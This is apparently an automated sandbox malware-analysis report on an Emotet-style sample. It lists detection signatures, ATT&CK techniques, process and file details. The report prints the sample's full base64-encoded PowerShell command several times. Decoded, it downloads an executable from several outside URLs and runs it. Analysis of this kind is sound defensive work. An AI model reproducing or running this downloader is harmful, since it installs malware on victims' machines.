ID: 281116
Cookbook: defaultwindowscmdlinecookbook.jbs
Time: 15:00:02
Date: 02/09/2020
Version: 29.0.0 Ocean Jasper


Copyright null 2020 Page 3 of 16

Analysis Report

Overview

General Information

Analysis ID: 281116

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Sigma detected: Emotet Process Creation
Sigma detected: Suspicious Encoded PowerShell Command Line
Encrypted powershell cmdline option found
PowerShell case anomaly found
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode
Enables debug privileges
May sleep (evasive loops) to hinder …
Queries the volume information (name …
Very long cmdline option found, this …

Classification

(classification chart; axes: Ransomware, Miner, Spreading, Phishing, Banker, Adware, Spyware, Trojan / Bot, Exploiter, Evader; scale: malicious, suspicious, clean)

Startup

System is w10x64

cmd.exe (PID: 6904 cmdline: cmd /C 'powersheLL -e JABFAHAAagA1ADgAOQBpAD0AKAAoACcAWABmADAAJwArACcAaAAnACkAKwAoACcAcgAzACcAKwAnAG wAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAcwBlAFIAcABSAG8AZgBpAGwARQBcAFAAUwAyADkAQgA2AE MAXABMAFMAcQAzAEIAXwBMAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAYwBUAG8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAG kAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAHIASQBgAFQAeQBQAFIAYABPAHQAYABPAGMAYABvAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAnAC sAJwAxADIALAAnACkAKwAnACAAJwArACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADEAJwApACsAJwAsACAAJwArACgAJwB0ACcAKwAnAGwAcwAnACkAKQA7ACQASABfADgA agB0ADUAYwAgAD0AIAAoACgAJwBaACcAKwAnAHYAaAAnACkAKwAoACcANQAnACsAJwBlAGEAJwApACsAJwBuAHYAJwApADsAJABSAF8AegBzAHYAMQBrAD0A KAAoACcAQgBjACcAKwAnAGQAdQBpACcAKQArACcAOAAnACsAJwB5ACcAKQA7ACQATABuAHgAcABoADkAbQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYA aQBsAGUAKwAoACgAJwA1AFQAJwArACgAJwB6ACcAKwAnAFAAJwArACcAcwAyADkAYgA2AGMAJwApACsAJwA1ACcAKwAoACcAVAB6ACcAKwAnAEwAcwAnACkA KwAoACcAcQAzACcAKwAnAGIAJwArACcAXwBsADUAVAB6ACcAKQApACAAIAAtAEMAUgBFAFAATABBAEMAZQAoACcANQBUACcAKwAnAHoAJwApACwAWwBjAEgA QQBSAF0AOQAyACkAKwAkAEgAXwA4AGoAdAA1AGMAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABMAGIANwA4ADYAcgB5AD0AKAAoACcA VgAzACcAKwAnAHEANAAnACkAKwAoACcAcwAyACcAKwAnAGcAJwApACkAOwAkAFMAZQA1AHoAaAB0AG0APQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqACcA KwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AdwBFAEIAYwBMAGkAZQBOAHQAOwAkAEYAaQA4AGkAZwBvAGIAPQAoACcAaAAnACsAJwB0AHQAJwArACcAcAAnACsA JwA6AC8AJwArACgAJwAvAHIAJwArACcAdQBlACcAKQArACcAYwBrACcAKwAnAGUAcgAnACsAKAAnAHQALQAnACsAJwBvACcAKQArACgAJwBuAGwAaQBuACcAKwAnAGUAJw ArACcALgBkACcAKQArACgAJwBlAC8AJwArACcAYwBnAGkAJwApACsAJwAtAGIAJwArACgAJwBpAG4AJwArACcALwAnACkAKwAnAEsAJwArACgAJwByACcAKwAnAGgANwBu AHIAJwArACcAMQA5ADcAOAAnACsAJwAvACoAJwApACsAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAcwA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAo 
ACcAcgB1AGIAJwArACcAZQBuAHcAJwApACsAKAAnAGkAbgAnACsAJwBrAGUAbABtACcAKQArACgAJwBhAG4ALgAnACsAJwBuACcAKwAnAGwALwBjACcAKQArACcAZwBpAC cAKwAnAC0AJwArACcAYgBpACcAKwAoACcAbgAvACcAKwAnAGwAVQAnACkAKwAoACcASAAnACsAJwAvACoAaAB0ACcAKQArACcAdAAnACsAKAAnAHAAOgAnAC sAJwAvACcAKQArACgAJwAvACcAKwAnAHIAdQBwAGUAcgAnACkAKwAnAHQAJwArACgAJwBzAHQAJwArACcAcgBlACcAKQArACgAJwBlAHQALgBkACcAKwAnAGUAJwApACsA JwAvACcAKwAnAEgAJwArACgAJwBlAGkAZABpACcAKwAnAHMALQAnACkAKwAnAEUAJwArACgAJwB4ACcAKwAnAC8AYQB0AHQAYQAnACsAJwBjAGgALwB2ACcA KQArACcAQwAnACsAJwBGAFMAJwArACgAJwBhAGsAJwArACcAUABIAHEALwAqACcAKQArACcAaAAnACsAKAAnAHQAdABwADoALwAvACcAKwAnAHMAYQAnACkA KwAnAG0AJwArACgAJwBhAHQAZQBjACcAKwAnAGgAJwApACsAKAAnAG4AaQBjACcAKwAnAHMAJwApACsAJwAuAGMAJwArACgAJwBvAG0AJwArACcALwBfACcA KwAnAHMAYwByAGkAJwApACsAKAAnAHAAJwArACcAdABzAC8ARAAnACkAKwAoACcAVwB4AGkAcAAnACsAJwB3AC8AJwArACcAKgBoACcAKQArACcAdAAnACsA KAAnAHQAJwArACcAcAA6ACcAKQArACcALwAnACsAKAAnAC8AJwArACcAcwBjACcAKQArACcAaABhACcAKwAoACcAaQBkACcAKwAnAGwAJwApACsAKAAnAC4AZAAnACsAJw BlACcAKQArACcALwBiACcAKwAoACcAaQBsAGQAJwArACcAZQByAC8AJwApACsAJwBrACcAKwAnAGMAMQAnACsAKAAnAHIAcwA0ACcAKwAnADcAJwArACcANAA2ACcAKQAr ACcANQA3ACcAKwAnAC8AKgAnACsAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAnACsAJwAvAHMAJwApACsAKAAnAGEAJwArACcAdQBlAHIAYgBl AGMAawAuACcAKwAnAG4AJwArACcAZQB0AC8AYwBnAGkALQAnACkAKwAnAGIAJwArACcAaQAnACsAJwBuACcAKwAnAC8ATQAnACsAKAAnAFcAJwArACcAUgBP AGkAcwBHAFUARAAnACsAJwBwACcAKwAnAEIALwAqAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACsAKAAnADoALwAvACcAKwAnAHMAJwApACsAKAAnAGMAJwAr ACcAaABhACcAKQArACgAJwBlACcAKwAnAGYAZQByACcAKQArACgAJwAtAGYAJwArACcAcgBhAG4AJwArACcAawAuAGQAJwApACsAKAAnAGUALwBjACcAKwAnAGcAaQAtAG IAaQBuACcAKwAnAC8AYwAnACkAKwAnAGIAJwArACgAJwBqACcAKwAnADUAcgAnACkAKwAnAG4AJwArACgAJwBxAG0ANgA1ACcAKwAnAHoAJwArACcAbQA4AD MAJwApACsAJwAxACcAKwAnADIALwAnACkALgAiAFMAYABwAEwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUgB1AGgAMAB0ADQAbAA9ACgAKAAnAF IAdAAnACsAJwBwACcAKQArACgAJwAxAGgAYgAnACsAJwAzACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQASwBjAG8ANABsADYAOQAgAGkAbgAgACQARgBpAD 
gAaQBnAG8AYgApAHsAdAByAHkAewAkAFMAZQA1AHoAaAB0AG0ALgAiAEQAbwBXAGAATgBMAE8AYQBgAEQAZgBgAGkAbABFACIAKAAkAEsAYwBvADQAbAA2AD kALAAgACQATABuAHgAcABoADkAbQApADsAJABPAHYAeQAwAHIAegBwAD0AKAAnAEkAcwAnACsAKAAnAHkAJwArACcANABrAHMAZwAnACkAKQ7AEkAZgAgACg AKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABMAG4AeABwAGgAOQBtACkALgAiAEwAZQBuAGcAYABUAEgAIgAgAC0AZwBlACA AMgA1ADcAOAA2ACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAEwAbgB4AHAAaAA5AG0AKQA7ACQAQQA3AHo AegB6ADEAeQA9ACgAJwBMACcAKwAoACcAaQAnACsAJwBtAGIAMABfADQAJwApACkAOwBiAHIAZQBhAGsAOwAkAFUAaQA4AGQAaQB3AF8APQAoACgAJwBBAHg AYgBlACcAKwAnAHMAZgAnACkAKwAnAGcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABEADUAZwBnAGMAXwA3AD0AKAAnAEEAaAAnACsAKAAnAGEAJwArACc AcQBkACcAKQArACcAZwBuACcAKQA=' MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) powershell.exe (PID: 6956 cmdline: powersheLL -e JABFAHAAagA1ADgAOQBpAD0AKAAoACcAWABmADAAJwArACcAaAAnACkAKwAoACcAcgAzACcAKwAn AGwAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAcwBlAFIAcABSAG8AZgBpAGwARQBcAFAAUwAyADkAQgA2 AEMAXABMAFMAcQAzAEIAXwBMAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAYwBUAG8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABv AGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAHIASQBgAFQAeQBQAFIAYABPAHQAYABPAGMAYABvAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAn ACsAJwAxADIALAAnACkAKwAnACAAJwArACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADEAJwApACsAJwAsACAAJwArACgAJwB0ACcAKwAnAGwAcwAnACkAKQA7 ACQASABfADgAagB0ADUAYwAgAD0AIAAoACgAJwBaACcAKwAnAHYAaAAnACkAKwAoACcANQAnACsAJwBlAGEAJwApACsAJwBuAHYAJwApADsAJABSAF8AegBz AHYAMQBrAD0AKAAoACcAQgBjACcAKwAnAGQAdQBpACcAKQArACcAOAAnACsAJwB5ACcAKQA7ACQATABuAHgAcABoADkAbQA9ACQAZQBuAHYAOgB1AHMAZQBy AHAAcgBvAGYAaQBsAGUAKwAoACgAJwA1AFQAJwArACgAJwB6ACcAKwAnAFAAJwArACcAcwAyADkAYgA2AGMAJwApACsAJwA1ACcAKwAoACcAVAB6ACcAKwAn 
AEwAcwAnACkAKwAoACcAcQAzACcAKwAnAGIAJwArACcAXwBsADUAVAB6ACcAKQApACAAIAAtAEMAUgBFAFAATABBAEMAZQAoACcANQBUACcAKwAnAHoAJwAp ACwAWwBjAEgAQQBSAF0AOQAyACkAKwAkAEgAXwA4AGoAdAA1AGMAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABMAGIANwA4ADYAcgB5 AD0AKAAoACcAVgAzACcAKwAnAHEANAAnACkAKwAoACcAcwAyACcAKwAnAGcAJwApACkAOwAkAFMAZQA1AHoAaAB0AG0APQAmACgAJwBuAGUAdwAnACsAJwAt AG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AdwBFAEIAYwBMAGkAZQBOAHQAOwAkAEYAaQA4AGkAZwBvAGIAPQAoACcAaAAnACsAJwB0AHQAJwAr ACcAcAAnACsAJwA6AC8AJwArACgAJwAvAHIAJwArACcAdQBlACcAKQArACcAYwBrACcAKwAnAGUAcgAnACsAKAAnAHQALQAnACsAJwBvACcAKQArACgAJwBu AGwAaQBuACcAKwAnAGUAJwArACcALgBkACcAKQArACgAJwBlAC8AJwArACcAYwBnAGkAJwApACsAJwAtAGIAJwArACgAJwBpAG4AJwArACcALwAnACkAKwAn AEsAJwArACgAJwByACcAKwAnAGgANwBuAHIAJwArACcAMQA5ADcAOAAnACsAJwAvACoAJwApACsAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAcwA6 ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAcgB1AGIAJwArACcAZQBuAHcAJwApACsAKAAnAGkAbgAnACsAJwBrAGUAbABtACcAKQArACgAJwBhAG4ALgAn ACsAJwBuACcAKwAnAGwALwBjACcAKQArACcAZwBpACcAKwAnAC0AJwArACcAYgBpACcAKwAoACcAbgAvACcAKwAnAGwAVQAnACkAKwAoACcASAAnACsAJwAv ACoAaAB0ACcAKQArACcAdAAnACsAKAAnAHAAOgAnACsAJwAvACcAKQArACgAJwAvACcAKwAnAHIAdQBwAGUAcgAnACkAKwAnAHQAJwArACgAJwBzAHQAJwAr ACcAcgBlACcAKQArACgAJwBlAHQALgBkACcAKwAnAGUAJwApACsAJwAvACcAKwAnAEgAJwArACgAJwBlAGkAZABpACcAKwAnAHMALQAnACkAKwAnAEUAJwAr ACgAJwB4ACcAKwAnAC8AYQB0AHQAYQAnACsAJwBjAGgALwB2ACcAKQArACcAQwAnACsAJwBGAFMAJwArACgAJwBhAGsAJwArACcAUABIAHEALwAqACcAKQAr ACcAaAAnACsAKAAnAHQAdABwADoALwAvACcAKwAnAHMAYQAnACkAKwAnAG0AJwArACgAJwBhAHQAZQBjACcAKwAnAGgAJwApACsAKAAnAG4AaQBjACcAKwAn AHMAJwApACsAJwAuAGMAJwArACgAJwBvAG0AJwArACcALwBfACcAKwAnAHMAYwByAGkAJwApACsAKAAnAHAAJwArACcAdABzAC8ARAAnACkAKwAoACcAVwB4 AGkAcAAnACsAJwB3AC8AJwArACcAKgBoACcAKQArACcAdAAnACsAKAAnAHQAJwArACcAcAA6ACcAKQArACcALwAnACsAKAAnAC8AJwArACcAcwBjACcAKQAr ACcAaABhACcAKwAoACcAaQBkACcAKwAnAGwAJwApACsAKAAnAC4AZAAnACsAJwBlACcAKQArACcALwBiACcAKwAoACcAaQBsAGQAJwArACcAZQByAC8AJwAp 
ACsAJwBrACcAKwAnAGMAMQAnACsAKAAnAHIAcwA0ACcAKwAnADcAJwArACcANAA2ACcAKQArACcANQA3ACcAKwAnAC8AKgAnACsAKAAnAGgAdAAnACsAJwB0 AHAAOgAnACkAKwAoACcALwAnACsAJwAvAHMAJwApACsAKAAnAGEAJwArACcAdQBlAHIAYgBlAGMAawAuACcAKwAnAG4AJwArACcAZQB0AC8AYwBnAGkALQAn ACkAKwAnAGIAJwArACcAaQAnACsAJwBuACcAKwAnAC8ATQAnACsAKAAnAFcAJwArACcAUgBPAGkAcwBHAFUARAAnACsAJwBwACcAKwAnAEIALwAqAGgAdAAn ACsAJwB0ACcAKQArACcAcAAnACsAKAAnADoALwAvACcAKwAnAHMAJwApACsAKAAnAGMAJwArACcAaABhACcAKQArACgAJwBlACcAKwAnAGYAZQByACcAKQAr ACgAJwAtAGYAJwArACcAcgBhAG4AJwArACcAawAuAGQAJwApACsAKAAnAGUALwBjACcAKwAnAGcAaQAtAGIAaQBuACcAKwAnAC8AYwAnACkAKwAnAGIAJwAr ACgAJwBqACcAKwAnADUAcgAnACkAKwAnAG4AJwArACgAJwBxAG0ANgA1ACcAKwAnAHoAJwArACcAbQA4ADMAJwApACsAJwAxACcAKwAnADIALwAnACkALgAi AFMAYABwAEwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUgB1AGgAMAB0ADQAbAA9ACgAKAAnAFIAdAAnACsAJwBwACcAKQArACgAJwAxAGgAYgAn ACsAJwAzACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQASwBjAG8ANABsADYAOQAgAGkAbgAgACQARgBpADgAaQBnAG8AYgApAHsAdAByAHkAewAkAFMAZQA1 AHoAaAB0AG0ALgAiAEQAbwBXAGAATgBMAE8AYQBgAEQAZgBgAGkAbABFACIAKAAkAEsAYwBvADQAbAA2ADkALAAgACQATABuAHgAcABoADkAbQApADsAJABP AHYAeQAwAHIAegBwAD0AKAAnAEkAcwAnACsAKAAnAHkAJwArACcANABrAHMAZwAnACkAKQ7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlA CcAKwAnAG0AJwApACAAJABMAG4AeABwAGgAOQBtACkALgAiAEwAZQBuAGcAYABUAEgAIgAgAC0AZwBlACAAMgA1ADcAOAA2ACkAIAB7ACYAKAAnAEkAbgB2A G8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAEwAbgB4AHAAaAA5AG0AKQA7ACQAQQA3AHoAegB6ADEAeQA9ACgAJwBMACcAKwAoACcAaQAnA CsAJwBtAGIAMABfADQAJwApACkAOwBiAHIAZQBhAGsAOwAkAFUAaQA4AGQAaQB3AF8APQAoACgAJwBBAHgAYgBlACcAKwAnAHMAZgAnACkAKwAnAGcAJwApA H0AfQBjAGEAdABjAGgAewB9AH0AJABEADUAZwBnAGMAXwA3AD0AKAAnAEEAaAAnACsAKAAnAGEAJwArACcAcQBkACcAKQArACcAZwBuACcAKQA= MD5: DBA3E6449E97D4E3DF64527EF7012A10) cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Emotet Process Creation

Sigma detected: Suspicious Encoded PowerShell Command Line

Signature Overview

• E-Banking Fraud
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection


E-Banking Fraud:

Malicious encrypted Powershell command line found

System Summary:

Very long command line found

Data Obfuscation:

PowerShell case anomaly found

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Mitre Att&ck Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Command and Scripting Interpreter 1 1; PowerShell 3; At (Linux); At (Windows)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Process Injection 1 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Masquerading 1; Virtualization/Sandbox Evasion 2; Process Injection 1 1; Deobfuscate/Decode Files or Information 1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Virtualization/Sandbox Evasion 2; Process Discovery 1; System Information Discovery 1 1; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Data Obfuscation; Junk Data; Steganography; Protocol Impersonation
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap

Behavior Graph

(behavior graph figure; legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet)

ID: 281116
Cookbook: defaultwindowscmdlinecookbook.jbs
Startdate: 02/09/2020
Architecture: WINDOWS
Score: 72

Process nodes: cmd.exe started powershell.exe and conhost.exe.

Signature labels shown on the graph: Malicious encrypted Powershell command line found; Sigma detected: Emotet Process Creation; Very long command line found; 3 other signatures; Encrypted powershell cmdline option found; PowerShell case anomaly found

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP info

General Information

Joe Sandbox Version: 29.0.0 Ocean Jasper
Analysis ID: 281116
Start date: 02.09.2020
Start time: 15:00:02
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 1m 47s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: defaultwindowscmdlinecookbook.jbs
Analysis system description: w10x64 64 bit v1803 with Office Professional Plus 2016, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: EGA enabled; HDC enabled; AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.bank.evad.win@4/1@0/0
Cookbook Comments: Adjust boot time; Enable AMSI; Stop behavior analysis, all processes terminated

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Size (bytes): 728
Entropy (8bit): 5.05097364910619
Encrypted: false
MD5: 900997B3FF6514BF775CAC6FFCBB6D4B
SHA1: CED01BFEE8A92DE7946C57AA3A8B9F043708E3D7
SHA-256: 740D9FC7EBE38ED3CCBB029A5592E89128F86039BABC8FEAA0CF1376201850C2
SHA-512: 3B408E288656F51077BF8104B5A02C68E34954213ECD75D45588747A5C03E5572CB7EFF6DC5A27625A4C93D6FA185260324E0BE9B387DBF48656F1044010D4E2
Malicious: false
Reputation: low
Preview: @...e...... H...... <@.^.L."My...:...... Microsoft.PowerShell.ConsoleHostD...... fZve...F.....x.)...... System.Management.Automation4...... [...{a.C..%6..h...... System.Core.0...... G-.o...A...4B...... System..4...... Zg5..:O..g..q...... System.Xml..L...... 7.....J@...... ~...... #.Microsoft.Management.Infrastructure.8...... '....L..}...... System.Numerics.@...... Lo...QN...... @.G.@...@..@@.

Static File Info

No static file info

Network Behavior

No network behavior found

Code Manipulations

Statistics

Behavior

• cmd.exe
• conhost.exe
• powershell.exe


System Behavior

Analysis Process: cmd.exe PID: 6904 Parent PID: 4608

General

Start time: 15:00:47
Start date: 02/09/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true

Commandline: cmd /C 'powersheLL -e JABFAHAAagA1ADgAOQBpAD0AKAAoACcAWABmADAAJwArACcA aAAnACkAKwAoACcAcgAzACcAKwAnAGwAJwApACkAOwAuACgAJwBuAGUAdwAt ACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAcwBlAFIAcABSAG8A ZgBpAGwARQBcAFAAUwAyADkAQgA2AEMAXABMAFMAcQAzAEIAXwBMAFwAIAAt AGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAYwBUAG8AUgB5ADsAWwBOAGUA dAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6 ADoAIgBTAGUAQwBVAHIASQBgAFQAeQBQAFIAYABPAHQAYABPAGMAYABvAEwA IgAgAD0AIAAoACgAJwB0AGwAcwAnACsAJwAxADIALAAnACkAKwAnACAAJwAr ACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADEAJwApACsAJwAsACAAJwArACgA JwB0ACcAKwAnAGwAcwAnACkAKQA7ACQASABfADgAagB0ADUAYwAgAD0AIAAo ACgAJwBaACcAKwAnAHYAaAAnACkAKwAoACcANQAnACsAJwBlAGEAJwApACsA JwBuAHYAJwApADsAJABSAF8AegBzAHYAMQBrAD0AKAAoACcAQgBjACcAKwAn AGQAdQBpACcAKQArACcAOAAnACsAJwB5ACcAKQA7ACQATABuAHgAcABoADkA bQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwA1 AFQAJwArACgAJwB6ACcAKwAnAFAAJwArACcAcwAyADkAYgA2AGMAJwApACsA JwA1ACcAKwAoACcAVAB6ACcAKwAnAEwAcwAnACkAKwAoACcAcQAzACcAKwAn AGIAJwArACcAXwBsADUAVAB6ACcAKQApACAAIAAtAEMAUgBFAFAATABBAEMA ZQAoACcANQBUACcAKwAnAHoAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKwAk AEgAXwA4AGoAdAA1AGMAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcA KQApADsAJABMAGIANwA4ADYAcgB5AD0AKAAoACcAVgAzACcAKwAnAHEANAAn ACkAKwAoACcAcwAyACcAKwAnAGcAJwApACkAOwAkAFMAZQA1AHoAaAB0AG0A PQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAg AE4ARQB0AC4AdwBFAEIAYwBMAGkAZQBOAHQAOwAkAEYAaQA4AGkAZwBvAGIA PQAoACcAaAAnACsAJwB0AHQAJwArACcAcAAnACsAJwA6AC8AJwArACgAJwAv AHIAJwArACcAdQBlACcAKQArACcAYwBrACcAKwAnAGUAcgAnACsAKAAnAHQA LQAnACsAJwBvACcAKQArACgAJwBuAGwAaQBuACcAKwAnAGUAJwArACcALgBk ACcAKQArACgAJwBlAC8AJwArACcAYwBnAGkAJwApACsAJwAtAGIAJwArACgA JwBpAG4AJwArACcALwAnACkAKwAnAEsAJwArACgAJwByACcAKwAnAGgANwBu AHIAJwArACcAMQA5ADcAOAAnACsAJwAvACoAJwApACsAJwBoACcAKwAnAHQA dAAnACsAJwBwACcAKwAoACcAcwA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAo ACcAcgB1AGIAJwArACcAZQBuAHcAJwApACsAKAAnAGkAbgAnACsAJwBrAGUA 
bABtACcAKQArACgAJwBhAG4ALgAnACsAJwBuACcAKwAnAGwALwBjACcAKQAr ACcAZwBpACcAKwAnAC0AJwArACcAYgBpACcAKwAoACcAbgAvACcAKwAnAGwA VQAnACkAKwAoACcASAAnACsAJwAvACoAaAB0ACcAKQArACcAdAAnACsAKAAn AHAAOgAnACsAJwAvACcAKQArACgAJwAvACcAKwAnAHIAdQBwAGUAcgAnACkA KwAnAHQAJwArACgAJwBzAHQAJwArACcAcgBlACcAKQArACgAJwBlAHQALgBk ACcAKwAnAGUAJwApACsAJwAvACcAKwAnAEgAJwArACgAJwBlAGkAZABpACcA KwAnAHMALQAnACkAKwAnAEUAJwArACgAJwB4ACcAKwAnAC8AYQB0AHQAYQAn ACsAJwBjAGgALwB2ACcAKQArACcAQwAnACsAJwBGAFMAJwArACgAJwBhAGsA JwArACcAUABIAHEALwAqACcAKQArACcAaAAnACsAKAAnAHQAdABwADoALwAv ACcAKwAnAHMAYQAnACkAKwAnAG0AJwArACgAJwBhAHQAZQBjACcAKwAnAGgA JwApACsAKAAnAG4AaQBjACcAKwAnAHMAJwApACsAJwAuAGMAJwArACgAJwBv AG0AJwArACcALwBfACcAKwAnAHMAYwByAGkAJwApACsAKAAnAHAAJwArACcA dABzAC8ARAAnACkAKwAoACcAVwB4AGkAcAAnACsAJwB3AC8AJwArACcAKgBo ACcAKQArACcAdAAnACsAKAAnAHQAJwArACcAcAA6ACcAKQArACcALwAnACsA KAAnAC8AJwArACcAcwBjACcAKQArACcAaABhACcAKwAoACcAaQBkACcAKwAn AGwAJwApACsAKAAnAC4AZAAnACsAJwBlACcAKQArACcALwBiACcAKwAoACcA aQBsAGQAJwArACcAZQByAC8AJwApACsAJwBrACcAKwAnAGMAMQAnACsAKAAn AHIAcwA0ACcAKwAnADcAJwArACcANAA2ACcAKQArACcANQA3ACcAKwAnAC8A KgAnACsAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAnACsAJwAv AHMAJwApACsAKAAnAGEAJwArACcAdQBlAHIAYgBlAGMAawAuACcAKwAnAG4A JwArACcAZQB0AC8AYwBnAGkALQAnACkAKwAnAGIAJwArACcAaQAnACsAJwBu ACcAKwAnAC8ATQAnACsAKAAnAFcAJwArACcAUgBPAGkAcwBHAFUARAAnACsA JwBwACcAKwAnAEIALwAqAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACsAKAAn ADoALwAvACcAKwAnAHMAJwApACsAKAAnAGMAJwArACcAaABhACcAKQArACgA JwBlACcAKwAnAGYAZQByACcAKQArACgAJwAtAGYAJwArACcAcgBhAG4AJwAr ACcAawAuAGQAJwApACsAKAAnAGUALwBjACcAKwAnAGcAaQAtAGIAaQBuACcA KwAnAC8AYwAnACkAKwAnAGIAJwArACgAJwBqACcAKwAnADUAcgAnACkAKwAn AG4AJwArACgAJwBxAG0ANgA1ACcAKwAnAHoAJwArACcAbQA4ADMAJwApACsA JwAxACcAKwAnADIALwAnACkALgAiAFMAYABwAEwAaQB0ACIAKABbAGMAaABh AHIAXQA0ADIAKQA7ACQAUgB1AGgAMAB0ADQAbAA9ACgAKAAnAFIAdAAnACsA JwBwACcAKQArACgAJwAxAGgAYgAnACsAJwAzACcAKQApADsAZgBvAHIAZQBh AGMAaAAoACQASwBjAG8ANABsADYAOQAgAGkAbgAgACQARgBpADgAaQBnAG8A 
